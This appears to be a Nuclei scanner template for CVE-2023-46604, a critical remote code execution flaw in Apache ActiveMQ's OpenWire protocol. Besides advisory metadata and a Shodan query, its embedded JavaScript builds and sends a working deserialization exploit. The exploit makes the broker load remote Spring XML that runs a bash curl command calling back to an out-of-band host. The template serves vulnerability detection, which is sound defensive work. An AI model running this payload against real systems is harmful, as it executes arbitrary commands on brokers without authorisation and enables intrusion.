id: CVE-2023-46604 info: name: Apache ActiveMQ - Remote Code Execution author: Ice3man,Mzack9999,pdresearch severity: critical description: | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. reference: - http://www.openwall.com/lists/oss-security/2023/10/27/5 - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt - https://github.com/X1r0z/ActiveMQ-RCE - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog - https://paper.seebug.org/3058/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-46604 cwe-id: CWE-502 epss-score: 0.97273 epss-percentile: 0.99837 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: activemq shodan-query: product:"ActiveMQ OpenWire Transport" tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev variables: prefix: "1f00000000000000000001010042" classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" final: "{{prefix}}{{classname}}" javascript: - code: | let m1 = require('nuclei/net'); let m2 = require('nuclei/bytes'); let b = m2.Buffer(); let name=Host+':'+Port; let conn = m1.Open('tcp', name); let randomvar = '{{randstr}}'.toLowerCase(); var Base64={encode: btoa} exploit_xml=`http://${oob}/b64_body:`+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/' packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" packet+=(exploit_xml.length).toString(16) packet+=(b.WriteString(exploit_xml)).Hex() conn.SendHex(packet); resp = conn.RecvString() randomvar args: Host: "{{Host}}" Port: "61616" oob: "{{interactsh-url}}" matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, response)' condition: and # digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950